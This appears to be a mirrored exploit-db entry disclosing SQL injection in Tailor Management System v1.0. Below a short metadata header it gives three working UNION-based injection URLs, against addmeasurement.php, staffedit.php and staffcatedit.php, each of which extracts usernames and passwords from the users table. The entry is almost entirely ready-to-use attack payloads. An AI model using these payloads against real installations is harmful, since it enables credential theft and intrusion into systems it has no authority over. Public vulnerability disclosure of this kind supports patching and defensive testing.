Tailor Management System – ‘id’ SQL Injection

  • 作者: Mosaaed
    日期: 2020-09-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48797/
  • # Exploit Title: Tailor Management System - 'id' SQL Injection
    # Google Dork: N/A
    # Date: 2020-09-08
    # Exploit Author: mosaaed
    # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
    # Version: v1.0
    # Tested on: Kali linux
    # CVE: N/A
    
    
    
    http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
    http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
    http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -